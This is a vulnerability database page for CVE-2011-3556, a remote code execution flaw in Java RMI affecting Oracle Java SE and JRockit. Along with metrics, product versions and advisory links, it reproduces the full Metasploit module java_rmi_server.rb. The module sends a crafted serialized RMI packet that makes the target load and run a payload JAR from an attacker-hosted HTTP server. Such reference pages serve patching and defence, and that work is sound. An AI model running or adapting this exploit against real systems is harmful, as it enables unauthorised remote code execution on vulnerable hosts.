CVE-2011-3556 : Detail

CVE-2011-3556

54.64%V3
Network
2011-10-19
19h00 +00:00
2020-02-12
11h06 +00:00

CVE Descriptions

Unspecified vulnerability in the Java Runtime Environment component in Oracle Java SE JDK and JRE 7, 6 Update 27 and earlier, 5.0 Update 31 and earlier, 1.4.2_33 and earlier, and JRockit R28.1.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability, related to RMI, a different vulnerability than CVE-2011-3557.

CVE Information

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No information.

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 17535

Publication date : 2011-07-14 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: java_rmi_server.rb 13186 2011-07-15 20:44:08Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java RMI Server Insecure Default Configuration Java Code Execution',
      'Description'    => %q{
          This module takes advantage of the default configuration of the RMI Registry and
        RMI Activation services, which allow loading classes from any remote (HTTP) URL. As it
        invokes a method in the RMI Distributed Garbage Collector which is available via every
        RMI endpoint, it can be used against both rmiregistry and rmid, and against most other
        (custom) RMI endpoints as well.

          Note that it does not work against Java Management Extension (JMX) ports since those do
        not support remote class loading, unless another RMI endpoint is active in the same
        Java process.

          RMI method calls do not support or require any sort of authentication.
      },
      'Author'         => [ 'mihi' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 13186 $',
      'References'     =>
        [
          # RMI protocol specification
          [ 'URL', 'http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html'],
        ],
      'Platform'       => ['java', 'win', 'osx', 'linux', 'solaris'],
      'Privileged'     => true,
      'Payload'        => { 'BadChars' => '', 'DisableNops' => true },
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => ['java'],
              'Arch' => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Linux x86 (Native Payload)',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86,
            }
          ],
          [ 'Mac OS X PPC (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_PPC,
            }
          ],
          [ 'Mac OS X x86 (Native Payload)',
            {
              'Platform' => 'osx',
              'Arch' => ARCH_X86,
            }
          ]
        ],
      'DefaultTarget'  => 1
    ))
    register_options( [ Opt::RPORT(1099) ], self.class)
  end

  def exploit
    start_service()
    connect

    jar = rand_text_alpha(rand(8)+1) + '.jar'
    old_url = "file:./rmidummy.jar"
    new_url = get_uri + '/' + jar
    packet = gen_rmi_packet

    # Java strings in serialized data are prefixed with a 2-byte, big endian length
    # (at least, as long as they are shorter than 65536 bytes)
    find_me = [old_url.length].pack("n") + old_url

    idx = packet.index(find_me)
    len = [new_url.length].pack("n")

    # Now replace it with the new url
    packet[idx, find_me.length] = len + new_url

    # write out minimal header and packet
    print_status("Sending request for #{new_url}")
    #sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
    sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);

    # wait for the request to be handled
    while not session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end
  end

  def on_request_uri(cli, request)
    if request.uri =~ /\.jar$/i
      p = regenerate_payload(cli)

      jar = p.encoded_jar
      paths = [
        [ "metasploit", "RMILoader.class" ],
        [ "metasploit", "RMIPayload.class" ],
      ]
      jar.add_files(paths, [ Msf::Config.data_directory, "java" ])

      send_response(cli, jar.pack,
      {
        'Content-Type' => 'application/java-archive',
        'Connection'   => 'close',
        'Pragma'       => 'no-cache'
      })

      print_status("Replied to Request for Payload JAR")
    end
  end

  def gen_rmi_packet
    "\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\xf6\xb6\x89\x8d\x8b\xf2\x86\x43\x75\x72\x00\x18\x5b\x4c\x6a" +
    "\x61\x76\x61\x2e\x72\x6d\x69\x2e\x73\x65\x72\x76\x65\x72\x2e\x4f" +
    "\x62\x6a\x49\x44\x3b\x87\x13\x00\xb8\xd0\x2c\x64\x7e\x02\x00\x00" +
    "\x70\x78\x70\x00\x00\x00\x00\x77\x08\x00\x00\x00\x00\x00\x00\x00" +
    "\x00\x73\x72\x00\x14\x6d\x65\x74\x61\x73\x70\x6c\x6f\x69\x74\x2e" +
    "\x52\x4d\x49\x4c\x6f\x61\x64\x65\x72\xa1\x65\x44\xba\x26\xf9\xc2" +
    "\xf4\x02\x00\x00\x74\x00\x13\x66\x69\x6c\x65\x3a\x2e\x2f\x72\x6d" +
    "\x69\x64\x75\x6d\x6d\x79\x2e\x6a\x61\x72\x78\x70\x77\x01\x00\x0a"
  end
end

Products Mentioned

Configuration 0

Sun>>Jdk >> Version 1.7.0

Sun>>Jre >> Version 1.7.0

Configuration 0

Oracle>>Jrockit >> Version To (including) r28.1.4

Oracle>>Jrockit >> Version r28.0.0

Oracle>>Jrockit >> Version r28.0.1

Oracle>>Jrockit >> Version r28.0.2

Oracle>>Jrockit >> Version r28.1.0

Oracle>>Jrockit >> Version r28.1.1

Oracle>>Jrockit >> Version r28.1.3

Configuration 0

Sun>>Jdk >> Version To (including) 1.6.0

Sun>>Jdk >> Version 1.6.0

Sun>>Jre >> Version To (including) 1.6.0

Sun>>Jre >> Version 1.6.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.5.0

Sun>>Jdk >> Version 1.5.0

Sun>>Jre >> Version To (including) 1.5.0

Sun>>Jre >> Version 1.5.0

Configuration 0

Sun>>Jdk >> Version To (including) 1.4.2_33

Sun>>Jdk >> Version 1.4.2

Sun>>Jdk >> Version 1.4.2_1

Sun>>Jdk >> Version 1.4.2_2

Sun>>Jdk >> Version 1.4.2_3

Sun>>Jdk >> Version 1.4.2_4

Sun>>Jdk >> Version 1.4.2_5

Sun>>Jdk >> Version 1.4.2_6

Sun>>Jdk >> Version 1.4.2_7

Sun>>Jdk >> Version 1.4.2_8

Sun>>Jdk >> Version 1.4.2_9

Sun>>Jdk >> Version 1.4.2_10

Sun>>Jdk >> Version 1.4.2_11

Sun>>Jdk >> Version 1.4.2_12

Sun>>Jdk >> Version 1.4.2_13

Sun>>Jdk >> Version 1.4.2_14

Sun>>Jdk >> Version 1.4.2_15

Sun>>Jdk >> Version 1.4.2_16

Sun>>Jdk >> Version 1.4.2_17

Sun>>Jdk >> Version 1.4.2_18

Sun>>Jdk >> Version 1.4.2_19

Sun>>Jdk >> Version 1.4.2_20

Sun>>Jdk >> Version 1.4.2_21

Sun>>Jdk >> Version 1.4.2_22

Sun>>Jdk >> Version 1.4.2_23

Sun>>Jdk >> Version 1.4.2_24

Sun>>Jdk >> Version 1.4.2_25

Sun>>Jdk >> Version 1.4.2_26

Sun>>Jdk >> Version 1.4.2_27

Sun>>Jdk >> Version 1.4.2_28

Sun>>Jdk >> Version 1.4.2_29

Sun>>Jdk >> Version 1.4.2_30

Sun>>Jdk >> Version 1.4.2_31

Sun>>Jdk >> Version 1.4.2_32

Sun>>Jre >> Version To (including) 1.4.2_33

Sun>>Jre >> Version 1.4.2

Sun>>Jre >> Version 1.4.2_1

Sun>>Jre >> Version 1.4.2_2

Sun>>Jre >> Version 1.4.2_3

Sun>>Jre >> Version 1.4.2_4

Sun>>Jre >> Version 1.4.2_5

Sun>>Jre >> Version 1.4.2_6

Sun>>Jre >> Version 1.4.2_7

Sun>>Jre >> Version 1.4.2_8

Sun>>Jre >> Version 1.4.2_9

Sun>>Jre >> Version 1.4.2_10

Sun>>Jre >> Version 1.4.2_11

Sun>>Jre >> Version 1.4.2_12

Sun>>Jre >> Version 1.4.2_13

Sun>>Jre >> Version 1.4.2_14

Sun>>Jre >> Version 1.4.2_15

Sun>>Jre >> Version 1.4.2_16

Sun>>Jre >> Version 1.4.2_17

Sun>>Jre >> Version 1.4.2_18

Sun>>Jre >> Version 1.4.2_19

Sun>>Jre >> Version 1.4.2_20

Sun>>Jre >> Version 1.4.2_21

Sun>>Jre >> Version 1.4.2_22

Sun>>Jre >> Version 1.4.2_23

Sun>>Jre >> Version 1.4.2_24

Sun>>Jre >> Version 1.4.2_25

Sun>>Jre >> Version 1.4.2_26

Sun>>Jre >> Version 1.4.2_27

Sun>>Jre >> Version 1.4.2_28

Sun>>Jre >> Version 1.4.2_29

Sun>>Jre >> Version 1.4.2_30

Sun>>Jre >> Version 1.4.2_31

Sun>>Jre >> Version 1.4.2_32

References

http://osvdb.org/76505
Tags : vdb-entry, x_refsource_OSVDB
http://www.securityfocus.com/bid/50231
Tags : vdb-entry, x_refsource_BID
http://security.gentoo.org/glsa/glsa-201406-32.xml
Tags : vendor-advisory, x_refsource_GENTOO
http://secunia.com/advisories/48692
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=134254866602253&w=2
Tags : vendor-advisory, x_refsource_HP
http://marc.info/?l=bugtraq&m=133365109612558&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/48308
Tags : third-party-advisory, x_refsource_SECUNIA
http://marc.info/?l=bugtraq&m=132750579901589&w=2
Tags : vendor-advisory, x_refsource_HP
http://rhn.redhat.com/errata/RHSA-2013-1455.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2011-1478.html
Tags : vendor-advisory, x_refsource_REDHAT
http://www.redhat.com/support/errata/RHSA-2011-1384.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=134254957702612&w=2
Tags : vendor-advisory, x_refsource_HP
http://secunia.com/advisories/49198
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.redhat.com/support/errata/RHSA-2012-0006.html
Tags : vendor-advisory, x_refsource_REDHAT
http://marc.info/?l=bugtraq&m=133728004526190&w=2
Tags : vendor-advisory, x_refsource_HP
http://www.securitytracker.com/id?1026215
Tags : vdb-entry, x_refsource_SECTRACK
http://www.ubuntu.com/usn/USN-1263-1
Tags : vendor-advisory, x_refsource_UBUNTU
https://www.kb.cert.org/vuls/id/597809
Tags : third-party-advisory, x_refsource_CERT-VN